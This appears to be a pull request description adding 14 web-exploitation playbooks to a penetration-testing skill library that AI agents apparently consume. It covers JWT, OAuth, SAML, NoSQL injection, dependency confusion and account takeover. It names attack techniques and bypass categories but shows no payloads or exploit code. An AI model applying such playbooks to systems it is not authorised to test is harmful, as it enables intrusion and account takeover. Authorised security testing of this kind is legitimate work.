Adds the 14 highest-bounty web vuln classes that were missing from `skills/exploit/web/`. Closes the methodology gap for JWT, OAuth, SAML, NoSQL, LDAP, Cache Deception, Open Redirect, Mass Assignment, XPath/XSLT, DOM Clobbering, XS-Leaks, ATO methodology, Proxy Misconfig — plus the first `skills/exploit/supplychain/` leaf for Dependency Confusion.

Pairs with #242 (corpus submodule) — every leaf cross-references the corresponding PayloadsAllTheThings catalog at `skills/_corpus/payloads/<class>/` so agents can drill down for additional bypass variants.

## Why

The pre-existing `skills/exploit/web/` had 15 leaves; the post-PR-#241 + corpus inventory shows 30+ classes missing. **The missing classes are exactly the high-paying modern ones**: JWT alg confusion, OAuth redirect_uri bypasses, SAML XSW, SSO ATO chains, Dependency Confusion. Without these, every non-recon engagement that triggers handoff to `skills/exploit/web/` for these classes drops to bare-router fallback.

## Leaves (14 new)

| Path | Coverage |
|---|---|
| `web/jwt/` | alg=none, HS256↔RS256, kid injection, jku spoofing, weak HMAC offline crack |
| `web/oauth/` | redirect_uri 11-variant bypass table, state CSRF, PKCE downgrade, scope creep, account-linking ATO |
| `web/saml/` | XSW1-8, comment injection, sig stripping, KeyInfo confusion, replay |
| `web/nosqli/` | Mongo `$ne`/`$where`, CouchDB, Firebase, Redis module loading |
| `web/ldapi/` | wildcard auth bypass, blind char extraction, DN injection |
| `web/cache-deception/` | 8 suffix variants, deception vs poisoning, PII framing |
| `web/open-redirect/` | 18-variant bypass table, OAuth/SSRF/tabnabbing chains |
| `web/mass-assignment/` | privileged-field wordlist, Rails/DRF/Mongoose/Spring/Echo patterns, ORM leak counterpart |
| `web/xpath-xslt/` | XPath auth bypass + blind; XSLT `document()` SSRF + EXSLT RCE |
| `web/dom-clobbering/` | named-element overwrite, multi-level clobber, CSP nonce theft |
| `web/xs-leaks/` | frame counting, timing oracles, error events, XS-Search |
| `web/ato-methodology/` | 9 canonical ATO paths + chain table + decision tree |
| `web/proxy-misconfig/` | nginx alias, mod_rewrite SSRF, Spring Actuator, Tomcat mgr, IIS shortname |
| `supplychain/dep-confusion/` | published-higher-version recon + benign PoC framing |

## Leaf structure (consistent w/ existing `skills/exploit/web/cve.md` template)

Every new leaf includes:
- YAML frontmatter w/ `name`, `description`, `when_to_use` triggers, `mitre_attack` IDs, `subdomain`
- Numbered playbook w/ concrete tool commands (jwt_tool / hashcat / curl / Burp / NoSQLMap / SAML Raider / OpenRedireX / etc.)
- Payload tables (key technique area)
- Detection signature for recon
- PoC template
- Severity calibration table w/ CVSS strings
- Defender remediation snippet
- Real-world known exemplars w/ $-impact for stakeholder framing

## Cross-references

Each leaf references:
- The corresponding `skills/_corpus/payloads/<class>/README.md` (depends on #242)
- Adjacent Decepticon leaves (e.g. OAuth leaf links to JWT + open-redirect + ATO methodology)

## Validation

```bash
$ python3 scripts/ingest_corpus.py --report
summary: NEW=18, UNCHANGED=45 (63 classes total)   # before this PR
# after this PR + #242 merged
summary: UNCHANGED=63 (63 classes total)           # all leaves now mapped
```

## Stats

- 14 new SKILL.md files
- ~1,500 lines of methodology
- 1 atomic commit per `<type>(<scope>): <one-line> — <subchanges>` convention

## Not in this PR

- The 5 lowest-priority remaining classes (CSS-Injection, Type-Juggling, Regular-Expression-DoS, Server-Side-Include, Virtual-Hosts, Web-Sockets, Zip-Slip) — left for a follow-up so this PR stays reviewable